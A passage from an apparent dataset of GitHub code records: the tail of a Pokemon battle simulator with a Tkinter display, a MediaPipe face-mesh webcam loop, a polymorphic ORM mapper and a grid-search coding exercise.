[\"+character.team[options[i]].status+\"] Level \"+str(character.team[options[i]].level))\r\n print(\"Which pokemon do you want 
to switch to?\")\r\n badAnswer = True\r\n while badAnswer:\r\n option = input()\r\n if option.isdigit():\r\n option = int(option)\r\n if option in options:\r\n badAnswer = False\r\n else:\r\n print(\"That isn't a valid answer!\")\r\n else:\r\n print(\"That isn't a valid answer!\")\r\n \r\n print(character.name+\" is sending in \"+character.team[option].poke[\"name\"])\r\n character.team[0].statReset()\r\n character.team[0].subbing = False\r\n character.team[0].mirrored=\"\"\r\n opposite.team[0].mirrored=\"\"\r\n character.team[0].bideDamage = 0\r\n character.team[0].turncount[\"bide\"] = -1\r\n if character.team[0].transformed:\r\n character.team[0].unTransform()\r\n\r\n character.team[0], character.team[option] = character.team[option], character.team[0]\r\n character.team[0].statUpdate(\"send\",character.badges)\r\n character.team[0].setStats()\r\n return \"\"\r\n\r\n def pickOptions(self,character):\r\n validChoice = False\r\n if (character.team[0].charging == -1) and (not character.team[0].recharging) and (character.team[0].raging== -1):\r\n while not validChoice:\r\n print(character.name+\"'s Options\")\r\n print(\"[1] ATTACK [2] ITEM [3] SWAP\")\r\n macroOption = input()\r\n if macroOption not in ['1','2','3']:\r\n print(\"That is not a valid choice!\")\r\n\r\n elif (character.team[0].turncount[\"thrash\"] != -1) and macroOption == '3':\r\n print(\"A thrashing Pokemon cannot swap out!\")\r\n\r\n elif macroOption == '1':\r\n # if the pokemon is using bide or a thrashlike move, we continue using bide\r\n attacks = character.team[0].moveset\r\n\r\n if character.team[0].turncount[\"bide\"] != -1:\r\n return [\"attack\",character.team[0].bideUsed]\r\n if character.team[0].turncount[\"thrash\"] != -1:\r\n return [\"attack\",character.team[0].thrashUsed]\r\n if character.team[0].turncount[\"binding\"] != -1:\r\n return [\"attack\",character.team[0].bindUsed]\r\n\r\n # if the pokemon has no moves left to use, either because of disable or PP, it's STRUGGLE time\r\n struggleTime = True\r\n for a in range(len(attacks)):\r\n if (attacks[a][\"name\"] != character.team[0].disable) and (character.team[0].PP[a] != 0):\r\n # if at least one move is not disabled and is not out of PP, no need to struggle\r\n struggleTime = False\r\n if struggleTime:\r\n print(\"The pokemon must struggle!\")\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"] == \"Struggle\":\r\n struggle = self.moveInfo[\"moves\"][i] \r\n if character.team[0].moveset[len(character.team[0].moveset)-1]!=struggle:\r\n character.team[0].moveset.append(struggle)\r\n character.team[0].PP.append(0)\r\n return [\"attack\",len(character.team[0].moveset)-1]\r\n \r\n for i in range(len(attacks)):\r\n print(\"[\"+str(i+1)+\"] \"+attacks[i][\"name\"])\r\n option = input() \r\n if option != '0':\r\n if (not option.isdigit()): \r\n print(\"That is not a valid choice!\")\r\n elif (int(option)>(len(attacks))) or (int(option)<1):\r\n print(\"That is not a valid choice!\")\r\n elif attacks[int(option)-1][\"name\"] == character.team[0].disable:\r\n print(\"That move is disabled!\")\r\n elif character.team[0].PP[int(option)-1] == 0:\r\n print(\"That move has no PP!\")\r\n else:\r\n return [\"attack\",int(option)-1]\r\n elif macroOption == '2':\r\n items = character.items\r\n if len(items) == 0:\r\n print(\"You have no items!\")\r\n else:\r\n for i in range(len(items)):\r\n print(\"[\"+str(i+1)+\"] \"+items[i])\r\n print(\"Which item do you want to use? 
(0 to choose another option)\")\r\n option = input()\r\n if (not option.isdigit()):\r\n print(\"That is not a valid choice!\")\r\n elif (int(option)>(len(items))) or (int(option)<1):\r\n print(\"That is not a valid choice!\")\r\n elif option != '0':\r\n return [\"item\",int(option)-1]\r\n elif macroOption == '3':\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(\"You don't have Pokemon to switch to!\")\r\n print(\"\")\r\n else:\r\n for i in range(len(options)):\r\n print(\"[\"+str(options[i])+\"] \" + character.team[options[i]].poke[\"name\"]+\" [\"+character.team[options[i]].status+\"] Level \"+str(character.team[options[i]].level))\r\n print(\"Which pokemon do you want to switch to? (0 to choose another option)\")\r\n option = input()\r\n if (not option.isdigit()):\r\n print(\"That is not a valid choice!\")\r\n elif int(option) not in options:\r\n print(\"That is not a valid choice!\")\r\n elif int(option) != 0:\r\n return [\"swap\",int(option)]\r\n elif character.team[0].charging != -1:\r\n return [\"attack\",character.team[0].charging]\r\n elif character.team[0].recharging:\r\n return [\"recharge\"]\r\n elif character.team[0].raging != -1:\r\n return [\"attack\",character.team[0].raging]\r\n return\r\n\r\n def turn(self,optionPlayer,optionEnemy):\r\n moveInfo = self.moveInfo\r\n isOver = \"\"\r\n # option is a list of form [move/swap/item,address]\r\n optionTypePlayer = optionPlayer[0]\r\n optionTypeEnemy = optionEnemy[0]\r\n\r\n # swap happpens first always\r\n if optionTypePlayer == \"swap\":\r\n print(self.player.name+\" is swapping out \"+self.player.team[0].poke[\"name\"]+\" and is sending in \"+self.player.team[optionPlayer[1]].poke[\"name\"])\r\n self.player.team[0].statReset()\r\n self.player.team[0].subbing = False\r\n if self.player.team[0].mimic_on != -1:\r\n for i in len(moveInfo[\"moves\"]):\r\n if moveInfo[\"moves\"][i][\"name\"] == \"Mimic\":\r\n mimic = moveInfo[\"moves\"][i]\r\n self.player.team[0].moveset[self.player.team[0].mimic_on] = mimic\r\n self.player.team[0].mimic_on = -1\r\n\r\n if self.player.team[0].transformed:\r\n self.player.team[0].unTransform()\r\n\r\n self.player.team[0], self.player.team[optionPlayer[1]] = self.player.team[optionPlayer[1]], self.player.team[0]\r\n self.player.team[0].statUpdate(\"send\",self.player.badges)\r\n self.player.team[0].setStats()\r\n self.guiUpdate()\r\n if optionTypeEnemy == \"swap\":\r\n print(self.enemy.name+\" is swapping out \"+self.enemy.team[0].poke[\"name\"]+\" and is sending in \"+self.enemy.team[optionEnemy[1]].poke[\"name\"])\r\n self.enemy.team[0].statReset()\r\n self.enemy.team[0].subbing = False\r\n if self.enemy.team[0].mimic_on != -1:\r\n for i in len(moveInfo[\"moves\"]):\r\n if moveInfo[\"moves\"][i][\"name\"] == \"Mimic\":\r\n mimic = moveInfo[\"moves\"][i]\r\n self.enemy.team[0].moveset[self.player.team[0].mimic_on] = mimic\r\n self.enemy.team[0].mimic_on = -1\r\n\r\n if self.enemy.team[0].transformed:\r\n self.enemy.team[0].unTransform()\r\n\r\n self.enemy.team[0], self.enemy.team[optionEnemy[1]] = self.enemy.team[optionEnemy[1]], self.enemy.team[0]\r\n self.enemy.team[0].statUpdate(\"send\",self.enemy.badges)\r\n self.enemy.team[0].setStats()\r\n self.guiUpdate()\r\n # item happens next\r\n if optionTypePlayer == \"item\":\r\n parseItem(self.player,self.enemy,optionPlayer[1])\r\n self.guiUpdate()\r\n if optionTypeEnemy == \"item\":\r\n parseItem(self.enemy,self.player,optionEnemy[1])\r\n 
self.guiUpdate()\r\n # attacks happen next\r\n if optionTypeEnemy == \"attack\" or optionTypePlayer == \"attack\":\r\n isOver = self.attackPhase(optionPlayer,optionEnemy)\r\n if (optionTypeEnemy == \"recharge\") and (self.enemy.team[0].recharging>0) and (self.enemy.team[0].HP !=0):\r\n self.enemy.team[0].recharging = self.enemy.team[0].recharging - 1\r\n if self.enemy.team[0].recharging == 0:\r\n print(self.enemy.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n if (optionTypePlayer == \"recharge\") and (self.player.team[0].recharging>0) and (self.player.team[0].HP !=0):\r\n self.player.team[0].recharging = self.player.team[0].recharging - 1\r\n if self.player.team[0].recharging == 0:\r\n print(self.player.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n self.guiUpdate()\r\n # recharging will occur after the turn if necessary\r\n else:\r\n #in this case, we have to check status conditions separately\r\n if (optionTypeEnemy == \"recharge\") and (self.enemy.team[0].recharging>0) and (self.enemy.team[0].HP !=0):\r\n self.enemy.team[0].recharging = self.enemy.team[0].recharging - 1\r\n if self.enemy.team[0].recharging == 0:\r\n print(self.enemy.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n if (optionTypePlayer == \"recharge\") and (self.player.team[0].recharging>0) and (self.player.team[0].HP !=0):\r\n self.player.team[0].recharging = self.player.team[0].recharging - 1\r\n if self.player.team[0].recharging == 0:\r\n print(self.player.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n self.guiUpdate()\r\n\r\n [lossPlayer,playerToSwitch] = self.statusCheck(self.player,self.player.team[0],self.enemy.team[0])\r\n [lossEnemy,enemyToSwitch] = self.statusCheck(self.enemy,self.enemy.team[0],self.player.team[0])\r\n self.guiUpdate()\r\n if lossPlayer:\r\n if lossEnemy:\r\n print(\"Both players have lost the battle!\")\r\n return \"loss:both\"\r\n else:\r\n print(self.player.name+\" has lost the battle!\")\r\n return \"loss:player\"\r\n elif lossEnemy:\r\n print(self.enemy.name+ \" has lost the battle!\")\r\n return \"loss:enemy\"\r\n \r\n if playerToSwitch:\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n if enemyToSwitch:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n return isOver\r\n\r\n def guiUpdate(self): \r\n enemypoke = self.enemy.team[0]\r\n playerpoke = self.player.team[0]\r\n\r\n textE = \"NAME: \"+enemypoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(enemypoke.status).casefold()+\"\\tHP: \"+str(enemypoke.HP)+\"/\"+str(enemypoke.maxHP)+\"\\tPP: \"+str(enemypoke.PP) + \"\\tATT: \"+str(enemypoke.attack)+\"\\t\\tDEF: \"+str(enemypoke.defense)+\"\\t\\tSPEC: \"+str(enemypoke.special)+\"\\tSPD: \"+str(enemypoke.speed)\r\n textE = textE + \"\\nMOD: \"+str(enemypoke.modifiers)+\"\\tCONF: \"+str(enemypoke.confused)+\"\\tTURNCT: \"+str(enemypoke.turncount)\r\n textE = textE + \"\\nLOC: \"+str(enemypoke.whereIs)+\"\\tLASTDAM: \"+str(enemypoke.lastDamage)+\"\\tMIR: \"+str(enemypoke.mirrorable)+\"\\tDIS: \"+str(enemypoke.disable) + \"\\tTRANSF: \"+str(enemypoke.transformed) + \"\\tRAGE: \"+str(enemypoke.raging)\r\n textE = textE + \"\\tRAGEACC: \"+str(enemypoke.rageAcc)+\"\\tSEED: \"+str(enemypoke.leechSeed)+\"\\tCHARGE: \"+str(enemypoke.charging)+\"\\nRECHARGE: \"+str(enemypoke.recharging) + \"\\tMIMIC: \"+str(enemypoke.mimic_on) + \"\\tWALL: \"+str(enemypoke.wall)\r\n textE = textE + \"\\tTHRASHUSED: 
\"+str(enemypoke.thrashUsed)+\"\\tBIDEUSED: \"+str(enemypoke.bideUsed) + \"\\tBINDUSED: \"+str(enemypoke.bindUsed)+\"\\tBIDEDAM: \"+str(enemypoke.bideDamage) + \"\\tBINDDAM: \"+str(enemypoke.bindDamage)\r\n textE = textE + \"\\nTYPES: \"+str(enemypoke.types) + \"\\tXACC: \"+str(enemypoke.xAcc)+ \"\\tSUB: \" + str(enemypoke.subbing) + \"\\tSUBHP: \" + str(enemypoke.subHP) + \"\\tMAXPP: \"+str(enemypoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(enemypoke.moveset)):\r\n textE = textE + enemypoke.moveset[i][\"name\"]\r\n if i != (len(enemypoke.moveset)-1):\r\n textE = textE + \", \"\r\n textE = textE + \"]\"\r\n self.label_stats_e.configure(text=textE,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n\r\n img_frontsprite = PhotoImage(file=\"gen1data/sprites/front-\"+str(enemypoke.poke[\"number\"])+\".png\")\r\n self.label_frontsprite.configure(image=img_frontsprite)\r\n self.label_frontsprite.image=img_frontsprite\r\n\r\n img_backsprite = PhotoImage(file=\"gen1data/sprites/back-\"+str(playerpoke.poke[\"number\"])+\".png\")\r\n self.label_backsprite.configure(image=img_backsprite)\r\n self.label_backsprite.image = img_backsprite\r\n\r\n textP = \"NAME: \"+playerpoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(playerpoke.status).casefold()+\"\\tHP: \"+str(playerpoke.HP)+\"/\"+str(playerpoke.maxHP)+\"\\tPP: \"+str(playerpoke.PP) + \"\\tATT: \"+str(playerpoke.attack)+\"\\t\\tDEF: \"+str(playerpoke.defense)+\"\\t\\tSPEC: \"+str(playerpoke.special)+\"\\tSPD: \"+str(playerpoke.speed)\r\n textP = textP + \"\\nMOD: \"+str(playerpoke.modifiers)+\"\\tCONF: \"+str(playerpoke.confused)+\"\\tTURNCT: \"+str(playerpoke.turncount)\r\n textP = textP + \"\\nLOC: \"+str(playerpoke.whereIs)+\"\\tLASTDAM: \"+str(playerpoke.lastDamage)+\"\\tMIR: \"+str(playerpoke.mirrorable)+\"\\tDIS: \"+str(playerpoke.disable) + \"\\tTRANSF: \"+str(playerpoke.transformed) + \"\\tRAGE: \"+str(playerpoke.raging)\r\n textP = textP + \"\\tRAGEACC: \"+str(playerpoke.rageAcc)+\"\\tSEED: \"+str(playerpoke.leechSeed)+\"\\tCHARGE: \"+str(playerpoke.charging)+\"\\nRECHARGE: \"+str(playerpoke.recharging) + \"\\tMIMIC: \"+str(playerpoke.mimic_on) + \"\\tWALL: \"+str(playerpoke.wall)\r\n textP = textP + \"\\tTHRASHUSED: \"+str(playerpoke.thrashUsed)+\"\\tBIDEUSED: \"+str(playerpoke.bideUsed) + \"\\tBINDUSED: \"+str(playerpoke.bindUsed)+\"\\tBIDEDAM: \"+str(playerpoke.bideDamage) + \"\\tBINDDAM: \"+str(playerpoke.bindDamage)\r\n textP = textP + \"\\nTYPES: \"+str(playerpoke.types) + \"\\tXACC: \"+str(playerpoke.xAcc)+ \"\\tSUB: \" + str(playerpoke.subbing) + \"\\tSUBHP: \" + str(playerpoke.subHP) + \"\\tMAXPP: \"+str(playerpoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(playerpoke.moveset)):\r\n textP = textP + playerpoke.moveset[i][\"name\"]\r\n if i != (len(playerpoke.moveset)-1):\r\n textP = textP + \", \"\r\n textP = textP + \"]\"\r\n\r\n self.label_stats_p.configure(text=textP,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n\r\n def guiInit(self):\r\n root = Tk()\r\n root.title('Battle')\r\n root.geometry('1900x300')\r\n root.configure(background = \"white\")\r\n root.resizable(False, False)\r\n options = {'padx': 5, 'pady': 5}\r\n\r\n # grab enemy pokemon details\r\n enemypoke = self.enemy.team[0]\r\n playerpoke = self.player.team[0]\r\n\r\n textE = \"NAME: \"+enemypoke.poke[\"name\"]+\"\\tSTATUS: \"+str(enemypoke.status).casefold()+\"\\tHP: \"+str(enemypoke.HP)+\"/\"+str(enemypoke.maxHP)+\"\\tPP: \"+str(enemypoke.PP) + \"\\tATT: \"+str(enemypoke.attack)+\"\\t\\tDEF: 
\"+str(enemypoke.defense)+\"\\t\\tSPEC: \"+str(enemypoke.special)+\"\\tSPD: \"+str(enemypoke.speed)\r\n textE = textE + \"\\nMOD: \"+str(enemypoke.modifiers)+\"\\tCONF: \"+str(enemypoke.confused)+\"\\tTURNCT: \"+str(enemypoke.turncount)\r\n textE = textE + \"\\nLOC: \"+str(enemypoke.whereIs)+\"\\tLASTDAM: \"+str(enemypoke.lastDamage)+\"\\tMIR: \"+str(enemypoke.mirrorable)+\"\\tDIS: \"+str(enemypoke.disable) + \"\\tTRANSF: \"+str(enemypoke.transformed) + \"\\tRAGE: \"+str(enemypoke.raging)\r\n textE = textE + \"\\tRAGEACC: \"+str(enemypoke.rageAcc)+\"\\tSEED: \"+str(enemypoke.leechSeed)+\"\\tCHARGE: \"+str(enemypoke.charging)+\"\\nRECHARGE: \"+str(enemypoke.recharging) + \"\\tMIMIC: \"+str(enemypoke.mimic_on) + \"\\tWALL: \"+str(enemypoke.wall)\r\n textE = textE + \"\\tTHRASHUSED: \"+str(enemypoke.thrashUsed)+\"\\tBIDEUSED: \"+str(enemypoke.bideUsed) + \"\\tBINDUSED: \"+str(enemypoke.bindUsed)+\"\\tBIDEDAM: \"+str(enemypoke.bideDamage) + \"\\tBINDDAM: \"+str(enemypoke.bindDamage)\r\n textE = textE + \"\\nTYPES: \"+str(enemypoke.types) + \"\\tXACC: \"+str(enemypoke.xAcc)+ \"\\tSUB: \" + str(enemypoke.subbing) + \"\\tSUBHP: \" + str(enemypoke.subHP) + \"\\tMAXPP: \"+str(enemypoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(enemypoke.moveset)):\r\n textE = textE + enemypoke.moveset[i][\"name\"]\r\n if i != (len(enemypoke.moveset)-1):\r\n textE = textE + \", \"\r\n textE = textE + \"]\"\r\n self.label_stats_e = Label(root,text=textE,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n self.label_stats_e.grid(column=0,row=0,sticky='W',**options)\r\n\r\n img_frontsprite = PhotoImage(file=\"gen1data/sprites/front-\"+str(enemypoke.poke[\"number\"])+\".png\")\r\n self.label_frontsprite = Label(root,image=img_frontsprite,background=\"white\")\r\n self.label_frontsprite.grid(column=1,row=0,**options)\r\n\r\n textP = \"NAME: \"+playerpoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(playerpoke.status).casefold()+\"\\tHP: \"+str(playerpoke.HP)+\"/\"+str(playerpoke.maxHP)+\"\\tPP: \"+str(playerpoke.PP) + \"\\tATT: \"+str(playerpoke.attack)+\"\\t\\tDEF: \"+str(playerpoke.defense)+\"\\t\\tSPEC: \"+str(playerpoke.special)+\"\\tSPD: \"+str(playerpoke.speed)\r\n textP = textP + \"\\nMOD: \"+str(playerpoke.modifiers)+\"\\tCONF: \"+str(playerpoke.confused)+\"\\tTURNCT: \"+str(playerpoke.turncount)\r\n textP = textP + \"\\nLOC: \"+str(playerpoke.whereIs)+\"\\tLASTDAM: \"+str(playerpoke.lastDamage)+\"\\tMIR: \"+str(playerpoke.mirrorable)+\"\\tDIS: \"+str(playerpoke.disable) + \"\\tTRANSF: \"+str(playerpoke.transformed) + \"\\tRAGE: \"+str(playerpoke.raging)\r\n textP = textP + \"\\tRAGEACC: \"+str(playerpoke.rageAcc)+\"\\tSEED: \"+str(playerpoke.leechSeed)+\"\\tCHARGE: \"+str(playerpoke.charging)+\"\\nRECHARGE: \"+str(playerpoke.recharging) + \"\\tMIMIC: \"+str(playerpoke.mimic_on) + \"\\tWALL: \"+str(playerpoke.wall)\r\n textP = textP + \"\\tTHRASHUSED: \"+str(playerpoke.thrashUsed)+\"\\tBIDEUSED: \"+str(playerpoke.bideUsed) + \"\\tBINDUSED: \"+str(playerpoke.bindUsed)+\"\\tBIDEDAM: \"+str(playerpoke.bideDamage) + \"\\tBINDDAM: \"+str(playerpoke.bindDamage)\r\n textP = textP + \"\\nTYPES: \"+str(playerpoke.types) + \"\\tXACC: \"+str(playerpoke.xAcc)+\"\\tSUB: \" + str(playerpoke.subbing) + \"\\tSUBHP: \" + str(playerpoke.subHP) + \"\\tMAXPP: \"+str(playerpoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(playerpoke.moveset)):\r\n textP = textP + playerpoke.moveset[i][\"name\"]\r\n if i != (len(playerpoke.moveset)-1):\r\n textP = textP + \", \"\r\n textP = textP + \"]\"\r\n self.label_stats_p = 
Label(root,text=textP,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n self.label_stats_p.grid(column=0,row=1,sticky='W',**options)\r\n\r\n img_backsprite = PhotoImage(file=\"gen1data/sprites/back-\"+str(playerpoke.poke[\"number\"])+\".png\")\r\n self.label_backsprite = Label(root,image=img_backsprite,background=\"white\")\r\n self.label_backsprite.grid(column=1,row=1,**options)\r\n\r\n\r\n def __init__(self,player,enemy,typeInfo,moveInfo):\r\n self.typeInfo = typeInfo\r\n self.moveInfo = moveInfo\r\n self.player = player\r\n self.enemy = enemy\r\n\r\n ### GUI INITIALIZATION\r\n self.guiInit()\r\n ###\r\n\r\n\r\n print(self.player.name+\" sends out \"+self.player.team[0].poke[\"name\"]+\"!\")\r\n self.player.team[0].statUpdate(\"send\",self.player.badges)\r\n self.player.team[0].setStats()\r\n print(self.enemy.name+\" sends out \"+self.enemy.team[0].poke[\"name\"]+\"!\")\r\n self.enemy.team[0].statUpdate(\"send\",self.enemy.badges)\r\n self.enemy.team[0].setStats()\r\n\r\n isOver = \"\"\r\n while isOver == \"\":\r\n self.guiUpdate()\r\n print(\"\")\r\n optionPlayer = self.pickOptions(self.player)\r\n print(\"\")\r\n optionEnemy = self.pickOptions(self.enemy) \r\n isOver = self.turn(optionPlayer,optionEnemy)\r\n\r\n input() \r\n","repo_name":"Brian-Frost-LaPlante/pkEnv","sub_path":"BattleClass.py","file_name":"BattleClass.py","file_ext":"py","file_size_in_byte":46901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4028889091","text":"from typing import NamedTuple\n\nimport cv2\nimport mediapipe as mp\n\nimport types_for_project as tp\n\n\ndef process_landmarks_loop(cap,\n face_mesher: mp.solutions.face_mesh.FaceMesh,\n landmark_relay: tp.LandmarkRelay,\n video_processor: tp.VideoProcessor):\n while cap.isOpened():\n success, image = cap.read()\n\n if not success:\n continue\n\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results: NamedTuple = face_mesher.process(image)\n\n if results.multi_face_landmarks:\n landmark_relay(results.multi_face_landmarks[0].landmark)\n\n if video_processor(image, results.multi_face_landmarks):\n break\n\n\ndef process_landmarks(landmark_processor: tp.LandmarkRelay, video_processor: tp.VideoProcessor):\n camera = cv2.VideoCapture(0)\n\n try:\n with mp.solutions.face_mesh.FaceMesh(\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5\n ) as face_mesh:\n process_landmarks_loop(camera, face_mesh, landmark_processor, video_processor)\n camera.release()\n\n except KeyboardInterrupt:\n camera.release();\n","repo_name":"JordanHendersonMusic/jellyfish","sub_path":"webcamtrack_mediapipe/landmark_processor.py","file_name":"landmark_processor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73168309539","text":"# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nfrom ascetic import exceptions\nfrom ascetic.mappers import Load, Mapper, OneToOne, Result\nfrom ascetic.utils import to_tuple\nfrom ascetic.utils import cached_property\nfrom ascetic.contrib.gfk import GenericForeignKey\n\n# TODO: Support for native support inheritance:\n# http://www.postgresql.org/docs/9.4/static/tutorial-inheritance.html\n# http://www.postgresql.org/docs/9.4/static/ddl-inherit.html\n\n\nclass NativePolymorphicMapper(object):\n pass\n\n\nclass PolymorphicMapper(Mapper):\n\n result_factory = staticmethod(lambda *a, 
**kw: PolymorphicResult(*a, **kw))\n\n def get_polymorphic_bases(self, derived_model):\n bases = []\n for base in derived_model.__bases__:\n if getattr(self.get_mapper(base), 'polymorphic', False):\n bases.append(base)\n else:\n bases += self.get_polymorphic_bases(base)\n return tuple(bases)\n\n @cached_property\n def polymorphic_bases(self):\n return tuple(self.get_mapper(base_model) for base_model in self.get_polymorphic_bases(self.model))\n\n # TODO: Fix the diamond inheritance problem???\n # I'm not sure is it a problem... After first base save model will has PK...\n # @cached_property\n # def polymorphic_mro(self):\n # pass\n\n @cached_property\n def polymorphic_fields(self):\n fields = OrderedDict()\n for base in self.polymorphic_bases:\n fields.update(base.polymorphic_fields)\n for name, field in self.fields.items():\n fields[name] = field\n return fields\n\n @cached_property\n def polymorphic_columns(self):\n cols = OrderedDict()\n for base in self.polymorphic_bases:\n cols.update(base.polymorphic_columns)\n for name, col in self.fields.items():\n cols[name] = col\n return cols\n\n @property\n def query(self):\n bases = self.polymorphic_bases\n if bases:\n base = bases[-1]\n q = base.query\n derived_mappers = (self,) + bases[:-1]\n for derived_mapper in derived_mappers:\n t = derived_mapper.sql_table\n q = q.fields(\n *self.get_sql_fields()\n ).tables((\n q.tables() & t\n ).on(\n t.pk == base.sql_table.pk\n ))\n else:\n q = super(PolymorphicMapper, self).query\n q.result = PolymorphicResult(self, self._default_db())\n return q\n\n def _do_prepare_model(self, model):\n for base in model.mro():\n if base is not model and getattr(self.get_mapper(base), 'polymorphic', False):\n pk_related_name = \"{}_ptr\".format(base.__name__.lower())\n # self.pk = \"{}_id\".format(pk_related_name) # Useless, pk read from DB\n # TODO: support multiple inheritance\n setattr(model, pk_related_name, OneToOne(\n base,\n field=self.get_mapper(model).pk,\n related_field=self.get_mapper(base).pk,\n related_name=model.__name__.lower(),\n query=(lambda rel: rel.mapper.query.polymorphic(False)),\n related_query=(lambda rel: rel.related_mapper.query.polymorphic(False))\n ))\n break\n else:\n if getattr(self.get_mapper(model), 'polymorphic', False):\n setattr(model, \"concrete_instance\", GenericForeignKey(\n type_field=\"polymorphic_type_id\",\n related_field=(lambda rel: rel.related_mapper.pk),\n field=self.get_mapper(model).pk,\n ))\n super(PolymorphicMapper, self)._do_prepare_model(self.model)\n\n def load(self, data, db, from_db=True, reload=False):\n return PolymorphicLoad(self, data, db, from_db, reload).compute()\n\n def validate(self, obj, fields=frozenset(), exclude=frozenset()):\n errors = {}\n for base in self.polymorphic_bases:\n try:\n base.validate(obj, fields=fields, exclude=exclude)\n except exceptions.ValidationError as e:\n errors.update(e.args[0])\n\n try:\n super(PolymorphicMapper, self).validate(obj, fields=fields, exclude=exclude)\n except exceptions.ValidationError as e:\n errors.update(e.args[0])\n\n if errors:\n raise exceptions.ValidationError(errors)\n\n def save(self, obj):\n if not self.polymorphic_fields['polymorphic_type_id'].get_value(obj):\n obj.polymorphic_type_id = self.get_mapper(obj.__class__).name\n for base in self.polymorphic_bases:\n new_record = self.is_new(obj)\n base.save(obj)\n for key, base_key in zip(to_tuple(self.pk), to_tuple(base.pk)):\n self.fields[key].set_value(obj, self.polymorphic_fields[base_key].get_value(obj))\n self.is_new(obj, new_record)\n return 
super(PolymorphicMapper, self).save(obj)\n\n\nclass PolymorphicResult(Result):\n\n _polymorphic = True\n\n def polymorphic(self, val=True):\n self._polymorphic = val\n return self._query\n\n def fill_cache(self):\n if self._cache is not None or not self._polymorphic:\n return super(PolymorphicResult, self).fill_cache()\n\n if self._cache is None:\n polymorphic, self._polymorphic = self._polymorphic, False\n self._cache = list(self.iterator())\n self._cache = PopulatePolymorphic(self._cache, self.mapper.get_mapper).compute()\n self.populate_prefetch()\n self._polymorphic = polymorphic\n return self\n\n def iterator(self):\n for obj in super(PolymorphicResult, self).iterator():\n yield obj.concrete_instance if self._polymorphic and hasattr(obj, 'concrete_instance') else obj\n\n\nclass PopulatePolymorphic(object):\n\n def __init__(self, rows, mapper_accessor):\n self._rows = rows\n self._get_mapper = mapper_accessor\n\n def compute(self):\n if not self._rows:\n return []\n return self._get_populated_rows()\n\n def _get_populated_rows(self):\n rows = self._rows[:]\n typed_objects = self._get_typed_objects()\n for i, obj in enumerate(rows):\n if obj.polymorphic_type_id in typed_objects:\n rows[i] = typed_objects[obj.polymorphic_type_id][self._get_current_mapper().get_pk(obj)]\n return rows\n\n def _get_typed_objects(self):\n typed_objects = {}\n pks = {self._get_current_mapper().get_pk(i) for i in self._rows}\n for ct in self._get_content_types():\n mapper = self._get_mapper(ct)\n typed_objects[ct] = {mapper.get_pk(i): i for i in mapper.query.where(mapper.sql_table.pk.in_(pks))}\n return typed_objects\n\n def _get_current_mapper(self):\n current_model = self._rows[0].__class__\n return self._get_mapper(current_model)\n\n def _get_content_types(self):\n content_types = {i.polymorphic_type_id for i in self._rows}\n content_types -= {self._get_current_mapper().name}\n return content_types\n\n\nclass PolymorphicLoad(Load):\n def _map_data_from_db(self, data, columns=None):\n columns = columns or self._mapper.polymorphic_columns\n return super(PolymorphicLoad, self)._map_data_from_db(data, columns)\n","repo_name":"emacsway/ascetic","sub_path":"ascetic/contrib/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"72002102180","text":"import sys\nsys.setrecursionlimit(10000)\n# 상하좌우 움직임 저장\ndx = [1,-1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef dfs(y, x):\n visited[y][x] = True\n for i in range(4):\n rx = dx[i] + x\n ry = dy[i] + y\n if rx < 0 or rx >= m or ry < 0 or ry >= n:\n continue\n if world[ry][rx] == 1 and not visited[ry][rx]:\n dfs(ry, rx)\n\nt = int(input())\n\nfor _ in range(t):\n m, n, k = map(int, input().split())\n # 유기농 배추의 world를 생성\n world = [[0] * m for _ in range(n)]\n visited = [[False] * m for _ in range(n)]\n cnt = 0\n\n # 유기농 배추가 있는 곳에 1을 표시\n for i in range(k):\n x, y = map(int, input().split())\n world[y][x] = 1\n\n # dfs()를 통해서 유기농 배추를 지렁이로 관리할 수 있는 구역 개수 구하기\n for i in range(n):\n for j in range(m):\n if world[i][j] == 1 and not visited[i][j]:\n dfs(i, j)\n cnt += 1\n print(cnt)","repo_name":"YUL-git/Python-Coding","sub_path":"백준/DFS BFS/beck_1012 유기농 배추.py","file_name":"beck_1012 유기농 배추.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41063439876","text":"import nltk\r\nimport re\r\nimport time\r\nimport pprint\r\nimport urllib\r\nfrom 
